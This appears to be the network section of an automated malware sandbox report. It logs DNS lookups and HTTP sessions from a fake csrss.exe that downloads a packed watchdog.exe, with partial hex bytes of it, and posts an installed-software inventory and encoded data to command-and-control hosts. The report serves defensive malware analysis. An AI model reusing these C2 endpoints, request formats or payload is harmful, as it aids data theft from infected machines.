                                                                                                                              Nov 11, 2021 20:35:37.410077095 CET8.8.8.8192.168.2.30x26e4No error (0)server3.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:37.410077095 CET8.8.8.8192.168.2.30x26e4No error (0)server3.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:48.726865053 CET8.8.8.8192.168.2.30x9707No error (0)server3.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:48.726865053 CET8.8.8.8192.168.2.30x9707No error (0)server3.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:48.920666933 CET8.8.8.8192.168.2.30x948cNo error (0)gohnot.com172.67.196.11A (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:48.920666933 CET8.8.8.8192.168.2.30x948cNo error (0)gohnot.com104.21.92.165A (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:35:51.067087889 CET8.8.8.8192.168.2.30x59e8No error (0)e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.comTXT (Text strings)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:36:01.379512072 CET8.8.8.8192.168.2.30x8ac5No error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:36:01.379512072 CET8.8.8.8192.168.2.30x8ac5No error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:37:02.025799036 CET8.8.8.8192.168.2.30x71fNo error (0)server3.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                                                                                              Nov 11, 2021 20:37:02.025799036 CET8.8.8.8192.168.2.30x71fNo error (0)server3.trumops.com104.21.79.9A (IP address)IN (0x0001)

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • runmodes.com
                                                                                                                              • server3.trumops.com
                                                                                                                              • gohnot.com

                                                                                                                              HTTP Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              0192.168.2.349743172.67.207.136443C:\Windows\rss\csrss.exe
                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              1192.168.2.349746172.67.139.144443C:\Windows\rss\csrss.exe
                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              2192.168.2.349747172.67.207.136443C:\Windows\rss\csrss.exe
                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              3192.168.2.349748172.67.139.144443C:\Windows\rss\csrss.exe
                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              4192.168.2.349750172.67.139.144443C:\Windows\rss\csrss.exe
                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              5192.168.2.349752104.21.34.203443C:\Windows\rss\csrss.exe
                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              6192.168.2.349807172.67.139.144443C:\Windows\rss\csrss.exe
                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              7192.168.2.349751172.67.196.1180C:\Windows\rss\csrss.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              Nov 11, 2021 20:35:48.952845097 CET1231OUTGET /546468561c5f48a95f3eb178d8283c2e/watchdog.exe HTTP/1.1
                                                                                                                              Host: gohnot.com
                                                                                                                              User-Agent: Go-http-client/1.1
                                                                                                                              Uuid: 3633e481-2f88-4842-b7ba-c5d7e0cc011f
                                                                                                                              Version: 183
                                                                                                                              Accept-Encoding: gzip
                                                                                                                              Nov 11, 2021 20:35:48.993185043 CET1232INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 11 Nov 2021 19:35:48 GMT
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Length: 2102272
                                                                                                                              Connection: keep-alive
                                                                                                                              content-disposition: attachment; filename=watchdog.exe
                                                                                                                              etag: "616ea494-201400"
                                                                                                                              last-modified: Tue, 19 Oct 2021 10:57:24 GMT
                                                                                                                              Cache-Control: max-age=3600
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 2147
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IZbZWdjamI%2BOlW6zrBCfymBq%2F3EM7AYENiKBU5VEfeBk8QwcSprlzIdARZfp9OhwkDRq0Hl79ZYMAk3bYiIZL5RRTbInTH8PueogXJMbnQaAbXXgXKMt2qHIOXr8"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 6ac9f742f94b4e19-FRA
                                                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                              Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00
                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M @
                                                                                                                              Nov 11, 2021 20:35:48.993232965 CET1234INData Raw: 00 c0 33 2e 39 35 00 55 50 58 21 0d 09 08 09 59 97 50 98 0e ef ba a0 1e 64 4d 00 e9 0c 20 00 00 b6 4b 00 26 27 00 ab ff ff ff ff ff 20 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 38 4c 67 64 4e 77 31 30 4f 4d 6e 6a 6e 45 61 66 ff ff 6f ff 6f 75 6f
                                                                                                                              Data Ascii: 3.95UPX!YPdM K&' Go build ID: "8LgdNw10OMnjnEafoouob/F_u>d7bw5LzGyMt067q/f_4En-IIykrT4Xu-NukD/RUnzYHIbGfj1LuaRla" d;av 'D$$`k&fdnlL$hmg$
                                                                                                                              Nov 11, 2021 20:35:48.993280888 CET1235INData Raw: c1 57 72 50 84 1b b4 07 0c a9 08 71 3f 90 7d de 6c e4 a9 20 1b f8 1b 21 df ad c0 e2 ca 88 15 bb fa 01 45 e5 1b 02 8f 10 2c 27 e6 95 4d 43 db 5d 39 d9 18 20 bb 9c 8b e2 a9 2b 74 90 61 97 52 a9 04 39 28 20 64 b1 3b 7a f8 08 aa b4 f3 57 8d 3d 35 39
                                                                                                                              Data Ascii: WrPq?}l !E,'MC]9 +taR9( d;zW=59ky,.@yi-(8HXh:xI.>!$2erxHj!pTq60#.?WD8kmNq_VN]SY?.7
                                                                                                                              Nov 11, 2021 20:35:48.993354082 CET1237INData Raw: bf 42 a2 88 a0 57 c9 0f 2e c1 75 06 0f 8b 86 02 97 f6 1f 1a 2e c0 75 02 7b 5b 6a 05 80 dd 13 76 df 41 40 18 8b 88 90 11 90 94 e4 90 17 89 fb ff 5f f5 cb c1 e1 11 e4 89 d3 31 ca c1 e9 07 31 d1 89 da c1 eb 10 31 cb 89 98 45 c1 ff 37 b8 8d 04 1a 4d
                                                                                                                              Data Ascii: BW.u.u{[jvA@_111E7M15ivEbxVsAuF&(fQ2f<c'9({'~7-E!2r5X*>- tgIfY^I t)1wxMeY!(@QN
                                                                                                                              Nov 11, 2021 20:35:48.993401051 CET1238INData Raw: c1 a8 d6 44 6d 1a 60 3e 6c 8d 1f c2 2d 70 2a 0b 02 8a ac 64 ab 33 3e 1e 66 67 70 a0 8b 4f f0 72 e4 ad 40 7f 5e 23 01 7e 30 b8 97 20 ed 79 ef 40 76 23 0e 4c 30 87 d1 47 e6 13 60 7f 40 ae 1c 83 c0 ac b0 02 66 2a 0a f0 14 b9 e8 a8 44 9d e5 54 2b 82
                                                                                                                              Data Ascii: Dm`>l-p*d3>fgpOr@^#~0 y@v#L0G`@f*DT+o0BqGt4;=&:%HId,fQlba0RlLp)-pKhxp$BA9M49L{^pA,}b?1DI'\8"?v>ehxAxv
                                                                                                                              Nov 11, 2021 20:35:48.993448973 CET1239INData Raw: 4d a8 ca 28 a6 e9 13 ae 78 fc a1 40 44 e8 09 83 c3 0c a4 52 fd 8b 7b fd 4b e0 1b fa 17 77 2d 8b 3f b4 01 fd 39 fa 76 1d fc ff 1f e8 f0 28 ce 29 fd 29 fa 39 e9 76 09 46 29 e9 39 c6 7c cd eb a8 8c 8b 83 1f 37 d7 eb df 0c 38 18 20 05 ff bd 19 c7 4c
                                                                                                                              Data Ascii: M(x@DR{Kw-?9v())9vF)9|78 L`0|4<$lCuL$)80@&)4D<-z80.btQL_a%I=z?[H,y@c$70i?Y(6-p*TY8Y7>lEz*P89Pf{
                                                                                                                              Nov 11, 2021 20:35:48.993493080 CET1241INData Raw: 49 38 85 a3 c2 00 d5 20 13 62 24 46 f8 05 01 bc ee ff be 02 23 d8 df f8 20 89 5c 24 04 14 32 32 c1 df 20 10 b0 92 b2 62 be 19 02 2b 23 0c 80 06 19 f1 32 f5 0b 5c 31 49 14 1c f5 af cf 6e 81 84 46 10 bb df eb 11 90 70 16 17 2c 60 26 51 58 90 01 59
                                                                                                                              Data Ascii: I8 b$F# \$22 b+#2\1InFp,`&QXYM9Q!uSP`GCJ#i`DF@'O[EJBBJKP07pl!A#?A(#:tx^G\2Dp%B*X3GZH
                                                                                                                              Nov 11, 2021 20:35:48.993542910 CET1242INData Raw: e9 7e 76 f4 3c 2e 32 3d 97 74 28 31 ff 97 ff 0b de 14 72 0e d8 8d 45 01 68 77 74 29 c1 89 ca f7 d9 c1 f9 06 d2 3b f8 1f 21 c8 01 f0 30 34 9e 38 97 57 c0 41 4e f1 a0 22 34 60 20 58 01 03 f3 5c 21 bc 6a 7f 6c 05 46 c6 7c 24 10 16 1c 60 2a 87 14 e1
                                                                                                                              Data Ascii: ~v<.2=t(1rEhwt);!048WAN"4` X\!jlF|$`*$)ZYq!+E|4tE_q_/]Kj hB9sG4V8?(ArZw ArkZ GX+\P ;A*\F1$",V3<hX
                                                                                                                              Nov 11, 2021 20:35:48.993587017 CET1243INData Raw: 94 cb 6c b8 e0 01 94 16 a3 a0 5a 89 c2 ad a4 5e d1 9b 3d ea eb f1 89 f8 e3 d3 88 07 9c 0d b9 08 4f 27 4d 5e 87 2a 8d ac df 93 07 9f ff f7 00 bc 78 f0 7c 3e 5f 1c 8b 48 08 81 f9 6d 54 1a 6c ff 88 ae b3 3e e9 72 f9 8c 02 25 79 16 29 02 f1 57 36 af
                                                                                                                              Data Ascii: lZ^=O'M^*x|>_HmTl>r%y)W6.=j+E9'O"ku\VR>IJ*bVm>p kt=FB3hy?(hFSx;?Y|%Ux$: \GWx?PrO#I
                                                                                                                              Nov 11, 2021 20:35:48.993638039 CET1245INData Raw: 0a 6f 76 c7 47 b3 47 6f 5b e2 b7 b5 d6 76 c5 0f 2c 10 00 3b 14 02 bd 49 38 46 1d 47 54 75 45 89 47 a3 23 f3 af fa 3c 8e 03 f0 fc 8d 74 24 34 19 f0 d6 54 42 68 3d 44 1e 5c 7c 31 06 dc d4 64 89 4c 55 85 b0 02 32 32 3e 85 db d9 48 45 b4 ff 74 83 c4
                                                                                                                              Data Ascii: ovGGo[v,;I8FGTuEG#<t$4TBh=D\|1dLU22>HEt\O8f06pWdhwjlptF[/C +U(KLmq'0'tp(#'I07E|(,3Wl/LT_AJGgR_K@~d
                                                                                                                              Nov 11, 2021 20:35:48.993690014 CET1246INData Raw: 0f 84 d5 0a 5a 12 ed 09 e8 12 77 d4 d8 44 7d 57 25 46 89 dc 2d fb 1f 03 1f 70 80 25 44 0f b6 12 f6 c2 01 1e 81 7b 9c 52 3f 8f 75 09 99 8c 48 19 7e ec 66 2b f3 44 01 08 8b 57 02 9b 01 9c 9d 85 8c 71 90 49 d8 e3 06 db c3 71 01 07 84 c2 26 c0 84 f0
                                                                                                                              Data Ascii: ZwD}W%F-p%D{R?uH~f+DWqIq&PciQi8pD3J02,\aHDJ# p_ DT.P<?8tfXg,\wg9t1i1OCTC5=2
                                                                                                                              Nov 11, 2021 20:36:19.168078899 CET3450OUTData Raw: 00
                                                                                                                              Data Ascii:
                                                                                                                              Nov 11, 2021 20:36:49.201649904 CET10509OUTData Raw: 00
                                                                                                                              Data Ascii:


                                                                                                                              HTTPS Proxied Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              0192.168.2.349743172.67.207.136443C:\Windows\rss\csrss.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2021-11-11 19:35:29 UTC0OUTPOST /api/log HTTP/1.1
                                                                                                                              Host: runmodes.com
                                                                                                                              User-Agent: Go-http-client/1.1
                                                                                                                              Content-Length: 144
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Accept-Encoding: gzip
                                                                                                                              2021-11-11 19:35:29 UTC0OUTData Raw: 58 53 38 2b 62 47 54 56 32 4f 4d 54 59 63 64 68 77 44 2b 76 62 30 4c 65 51 58 75 45 4e 4b 6b 4d 33 6a 4b 57 70 70 32 79 77 34 6c 6e 5a 72 67 52 47 33 6a 33 33 34 55 32 77 61 38 6c 57 6a 71 70 51 71 74 68 59 45 69 38 36 32 4f 5a 33 6e 6d 5a 54 39 52 67 4c 4f 33 4a 39 35 4c 58 75 43 6e 5a 34 4d 32 43 71 4e 71 5a 66 65 65 35 43 61 72 48 77 57 31 45 4a 58 44 2b 53 49 4d 4f 77 70 42 56 71 54 54 4d 54 78 76 4c 61 6e 51 53 74 6e 69 51
                                                                                                                              Data Ascii: XS8+bGTV2OMTYcdhwD+vb0LeQXuENKkM3jKWpp2yw4lnZrgRG3j334U2wa8lWjqpQqthYEi862OZ3nmZT9RgLO3J95LXuCnZ4M2CqNqZfee5CarHwW1EJXD+SIMOwpBVqTTMTxvLanQStniQ
                                                                                                                              2021-11-11 19:35:29 UTC0INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 11 Nov 2021 19:35:29 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M%2BzkfO2zQl9Rdrp42SwPbpTyMUmU5X1HcjmNSubNb6kxjAE%2BKcVqnc409%2F5H7ON9JN%2FtWNxiddTNYtQTbyKFp7gQl5bAfDYGnSoW2bQN%2F0pSJrEDZG%2FufL2bpHyHRiA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 6ac9f6c99be3dfdb-FRA
                                                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              1192.168.2.349746172.67.139.144443C:\Windows\rss\csrss.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2021-11-11 19:35:29 UTC0OUTPOST /bots/post-ia-data?uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011f HTTP/1.1
                                                                                                                              Host: server3.trumops.com
                                                                                                                              User-Agent: Go-http-client/1.1
                                                                                                                              Content-Length: 18950
                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                              Accept-Encoding: gzip
                                                                                                                              2021-11-11 19:35:29 UTC1OUTData Raw: 5b 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 33 20 78 36 34 20 4d 69 6e 69 6d 75 6d 20 52 75 6e 74 69 6d 65 20 2d 20 31 32 2e 30 2e 32 31 30 30 35 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 32 2e 30 2e 32 31 30 30 35 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 31 39 30 36 32 37 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 37 35 35 38 30 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b
                                                                                                                              Data Ascii: [{"display_name":"Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005","display_version":"12.0.21005","install_date":"20190627"},{"display_name":"Update for Microsoft Office 2016 (KB4475580) 32-Bit Edition","display_version":"","install_date":""},{
                                                                                                                              2021-11-11 19:35:29 UTC2OUTData Raw: 65 20 2d 20 31 34 2e 32 31 2e 32 37 37 30 32 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 34 2e 32 31 2e 32 37 37 30 32 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 31 39 30 36 32 37 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 50 75 62 6c 69 73 68 65 72 20 4d 55 49 20 28 45 6e 67 6c 69 73 68 29 20 32 30 31 36 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 39 20 58 36 34 20 41 64 64 69 74 69 6f 6e 61 6c 20 52 75
                                                                                                                              Data Ascii: e - 14.21.27702","display_version":"14.21.27702","install_date":"20190627"},{"display_name":"Microsoft Publisher MUI (English) 2016","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"Microsoft Visual C++ 2019 X64 Additional Ru
                                                                                                                              2021-11-11 19:35:29 UTC4OUTData Raw: 66 6f 72 20 42 75 73 69 6e 65 73 73 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 38 36 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4f 75 74 69 6c 73 20 64 65 20 76 c3 a9 72 69 66 69 63 61 74 69 6f 6e 20 6c 69 6e 67 75 69 73 74 69 71 75 65 20 32 30 31 36 20 64 65 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 c2 a0 2d 20 46 72 61 6e c3 a7 61 69 73 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65
                                                                                                                              Data Ascii: for Business 2016 (KB4484286) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Outils de vrification linguistique 2016 de Microsoft Office- Franais","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name
                                                                                                                              2021-11-11 19:35:29 UTC4OUTData Raw: 45 6e 67 6c 69 73 68 29 20 32 30 31 36 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 35 2d 32 30 31 39 20 52 65 64 69 73 74 72 69 62 75 74 61 62 6c 65 20 28 78 38 36 29 20 2d 20 31 34 2e 32 31 2e 32 37 37 30 32 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 34 2e 32 31 2e 32 37 37 30 32 2e 32 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63
                                                                                                                              Data Ascii: English) 2016","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702","display_version":"14.21.27702.2","install_date":""},{"display_name":"Security Update for Mic
                                                                                                                              2021-11-11 19:35:29 UTC8OUTData Raw: 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 37 33 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 34 38 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79
                                                                                                                              Data Ascii: ":"Security Update for Microsoft Excel 2016 (KB4484273) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4484248) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security
                                                                                                                              2021-11-11 19:35:29 UTC12OUTData Raw: 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 49 6e 66 6f 50 61 74 68 20 4d 55 49 20 28 45 6e 67 6c 69 73 68 29 20 32 30 31 36 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 49 45 34 44 61 74 61 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72
                                                                                                                              Data Ascii: Edition","display_version":"","install_date":""},{"display_name":"Microsoft InfoPath MUI (English) 2016","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"IE4Data","display_version":"","install_date":""},{"display_name":"Secur
                                                                                                                              2021-11-11 19:35:29 UTC16OUTData Raw: 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 30 31 31 35 37 34 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 31 30 36 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73
                                                                                                                              Data Ascii: splay_version":"","install_date":""},{"display_name":"Security Update for Microsoft Office 2016 (KB4011574) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4484106) 32-Bit Edition","display_vers
                                                                                                                              2021-11-11 19:35:29 UTC19INHTTP/1.1 404 Not Found
                                                                                                                              Date: Thu, 11 Nov 2021 19:35:29 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              x-powered-by: PHP/8.0.11
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vGS1xEh6LbXXdYk%2FUfHE3K9XHXOXdwE2lHJOtvHYtcyT5%2B9kHA7Kf8RkH5w6ASVjA0fcvzY3WJWPHRIBYbMyJfOmx%2B%2B35yaFyw7TA7MtjOV6VQ0xWJeJ4Ed3IWRwWuyLAm82%2ByYm"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 6ac9f6ca9af1e660-LHR
                                                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
